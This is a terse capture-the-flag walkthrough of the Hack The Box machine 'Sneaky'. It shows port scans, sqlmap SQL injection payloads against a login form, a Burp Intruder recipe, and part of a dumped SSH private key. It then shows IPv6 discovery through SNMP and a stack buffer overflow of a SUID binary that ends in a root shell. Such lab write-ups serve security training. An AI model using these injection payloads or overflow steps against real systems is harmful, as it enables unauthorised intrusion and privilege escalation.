kali@kali:~$ nmap -sC -sV 10.10.10.20
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 22:40 EDT
Nmap scan report for 10.10.10.20
Host is up (0.16s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!


kali@kali:~/go/bin$ sudo nmap -sU -sT -T4 --max-retries 0 10.10.10.20
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 22:51 EDT
Warning: 10.10.10.20 giving up on port because retransmission cap hit (0).
Warning: 10.10.10.20 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.20
Host is up (0.15s latency).
Not shown: 990 open|filtered ports, 761 filtered ports, 247 closed ports
PORT    STATE SERVICE
80/tcp  open  http
161/udp open  snmp




kali@kali:~/go/bin$ ./gobuster dir --url=http://10.10.10.20 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.20
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/04 22:43:25 Starting gobuster
===============================================================
/dev (Status: 301)




it's a login page


burp proxy for 127.0.0.1:8080, and set the browser do the same, interception is on, and we get the request for post on /dev/login.php, save to a file 123


name=123&pass=123kali@kali:~/Downloads$ sqlmap -r 123 -p pass --dbms mysql --level 4 --risk 3 --dbs 
        ___
       __H__                                                                                                      
 ___ ___[.]_____ ___ ___  {1.4.6#stable}                                                                          
|_ -| . ["]     | .'| . |                                                                                         
|___|_  [.]_|_|_|__,|  _|                                                                                         
      |_|V...       |_|   http://sqlmap.org                                                                       

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:49:33 /2020-07-04/

[23:49:33] [INFO] parsing HTTP request from '123'
[23:49:33] [INFO] testing connection to the target URL
[23:49:34] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
[23:49:39] [INFO] testing if the target URL content is stable
[23:49:39] [INFO] target URL content is stable
[23:49:40] [WARNING] heuristic (basic) test shows that POST parameter 'pass' might not be injectable
[23:49:40] [INFO] testing for SQL injection on POST parameter 'pass'
[23:49:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:49:55] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[23:50:00] [INFO] POST parameter 'pass' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[23:50:00] [INFO] testing 'Generic inline queries'
[23:50:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                                                                                             
[23:50:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:50:01] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:50:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:50:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:50:02] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:50:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                                                                                
[23:50:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:50:02] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:50:03] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:50:03] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:50:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[23:50:03] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[23:50:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[23:50:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[23:50:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[23:50:04] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[23:50:04] [INFO] testing 'MySQL inline queries'
[23:50:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:50:15] [INFO] POST parameter 'pass' appears to be 'MySQL >= 5.0.12 stacked queries (comment)' injectable 
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (4) value? [Y/n] 
[23:50:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:50:37] [INFO] POST parameter 'pass' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[23:50:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:50:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:50:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:50:38] [INFO] target URL appears to have 2 columns in query
[23:50:39] [INFO] POST parameter 'pass' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[23:50:39] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'pass' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 125 HTTP(s) requests:
---
Parameter: pass (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: name=123&pass=-5923' OR 5449=5449-- CRex

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: name=123&pass=123';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=123&pass=123' AND (SELECT 5415 FROM (SELECT(SLEEP(5)))UFVP)-- LnLv

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: name=123&pass=123' UNION ALL SELECT CONCAT(0x716a7a7a71,0x7a5a4943796f616762657a795567494262796b7a55695a45554f6f4357776a6d526e4d6c69484765,0x716b627671),NULL-- -
---
[23:51:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[23:51:01] [INFO] fetching database names
available databases [4]:
[*] dev
[*] information_schema
[*] mysql
[*] performance_schema


Parameter: name (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: name=-7068' OR 8424=8424 OR 'bmgy'='tzZL&pass=123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: name=123' AND (SELECT 5289 FROM (SELECT(SLEEP(5)))Ilbn) OR 'lkkl'='qLhh&pass=123


we can also use burp directly for sql injection
1. proxy the post
2. send that to intruder
3. setup position, Sniper attack,  we can Clear, and highlight the field then Add , something like name=$123$ or name=123$a$
4. setup the payload, payload option -> Load /usr/share/wordlist/wfuzz/injection/SQL.txt
5. start the attack, find that 200 one
6. ' or 1=1 or ''='

name: admin

name: thrasivoulos

aK0lbXblN2UNQnmnywP+HomHVH6qLIBEvwJPXHTlrFqzA6Q/tv7E3kT195MuS10J
VnfZf6pUiLtupDcYi0CEBmt5tE0cjxr78xYLf80rj8xcz+sSS3nm0ib0RMMAkr4x
hxNWWZcUFcRuxp5ogcvBdQKBgQDB/AYtGhGJbO1Y2WJOpseBY9aGEDAb8maAhNLd
1/iswE7tDMfdzFEVXpNoB0Z2UxZpS2WhyqZlWBoi/93oJa1on/QJlvbv4GO9y3LZ
LJpFwtDNu+XfUJ7irbS51tuqV1qmhmeZiCWIzZ5ahyPGqHEUZaR1mw2QfTIYpLrG
UkbZGwKBgGMjAQBfLX0tpRCPyDNaLebFEmw4yIhB78ElGv6U1oY5qRE04kjHm1k/
Hu+up36u92YlaT7Yk+fsk/k+IvCPum99pF3QR5SGIkZGIxczy7luxyxqDy3UfG31
rOgybvKIVYntsE6raXfnYsEcvfbaE0BsREpcOGYpsE+i7xCRqdLb



nmpwalk -v2c -c public 10.10.10.20 > snmp.txt

python enyx.py 2c public 10.10.10.20


[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:752d
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:752d

this tells us the ipv6 on this box


kali@kali:~/htb/sneaky$ ping6 dead:beef:0000:0000:0250:56ff:feb9:752d
PING dead:beef:0000:0000:0250:56ff:feb9:752d(dead:beef::250:56ff:feb9:752d) 56 data bytes
64 bytes from dead:beef::250:56ff:feb9:752d: icmp_seq=1 ttl=63 time=216 ms
64 bytes from dead:beef::250:56ff:feb9:752d: icmp_seq=2 ttl=63 time=153 ms
^C


it's up as well

scan on ipv6
kali@kali:~/Downloads$ nmap -6 -sC -sV dead:beef::250:56ff:feb9:752d
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 00:52 EDT
Nmap scan report for dead:beef::250:56ff:feb9:752d
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 5d:5d:2a:97:85:a1:20:e2:26:e4:13:54:58:d6:a4:22 (DSA)
|   2048 a2:00:0e:99:0f:d3:ed:b0:19:d4:6b:a8:b1:93:d9:87 (RSA)
|   256 e3:29:c4:cb:87:98:df:99:6f:36:9f:31:50:e3:b9:42 (ECDSA)
|_  256 e6:85:a8:f8:62:67:f7:01:28:a1:aa:00:b5:60:f2:21 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info: 
|   IPv6 EUI-64: 
|     MAC address: 
|       address: 00:50:56:b9:75:2d
|_      manuf: VMware

ssh is open on ipv6


kali@kali:/tmp$ ssh -i ./ssh.key thrasivoulos@dead:beef:0000:0000:0250:56ff:feb9:752d
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-75-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Jul  5 05:40:19 EEST 2020

  System load: 0.0               Memory usage: 5%   Processes:       178
  Usage of /:  9.9% of 18.58GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Sun May 14 20:22:53 2017 from dead:beef:1::1077
thrasivoulos@Sneaky:~$ 


find / -perm -4000 2>/dev/null


what is this file ?

/usr/local/bin/chal


thrasivoulos@Sneaky:~$ /usr/local/bin/chal 
Segmentation fault (core dumped)
thrasivoulos@Sneaky:~$ 
thrasivoulos@Sneaky:~$ 
thrasivoulos@Sneaky:~$ /usr/local/bin/chal 123
thrasivoulos@Sneaky:~$ string /usr/local/bin/chal 
No command 'string' found, did you mean:
 Command 'spring' from package 'spring' (universe)
 Command 'strings' from package 'binutils' (main)
 Command 'strings' from package 'binutils-multiarch' (main)
string: command not found
thrasivoulos@Sneaky:~$ strings /usr/local/bin/chal 
/lib/ld-linux.so.2
e"-h[
libc.so.6
_IO_stdin_used
strcpy


strcpy :)

$ sysctl -a | grep -i random
kernel.randomize_va_space = 0

ASLR is disabled....


gdb-peda$ pattern_offset 0x25415525
625038629 found at offset: 362


(gdb) b main*
Function "main*" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (main*) pending.
(gdb) r `python -c 'print "A"*500'`
Starting program: /usr/local/bin/chal `python -c 'print "A"*500'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info frame
Stack level 0, frame at 0xbffff4e4:
 eip = 0x41414141; saved eip = 0x41414141
 called by frame at 0xbffff4e8
 Arglist at 0xbffff4dc, args: 
 Locals at 0xbffff4dc, Previous frame's sp is 0xbffff4e4
 Saved registers:
  eip at 0xbffff4e0
(gdb) quit
A debugging session is active.

        Inferior 1 [process 1881] will be killed.

Quit anyway? (y or n) y
thrasivoulos@Sneaky:~$ vi input.py 
thrasivoulos@Sneaky:~$ /usr/local/bin/chal `python input.py`
# 
# 
# 






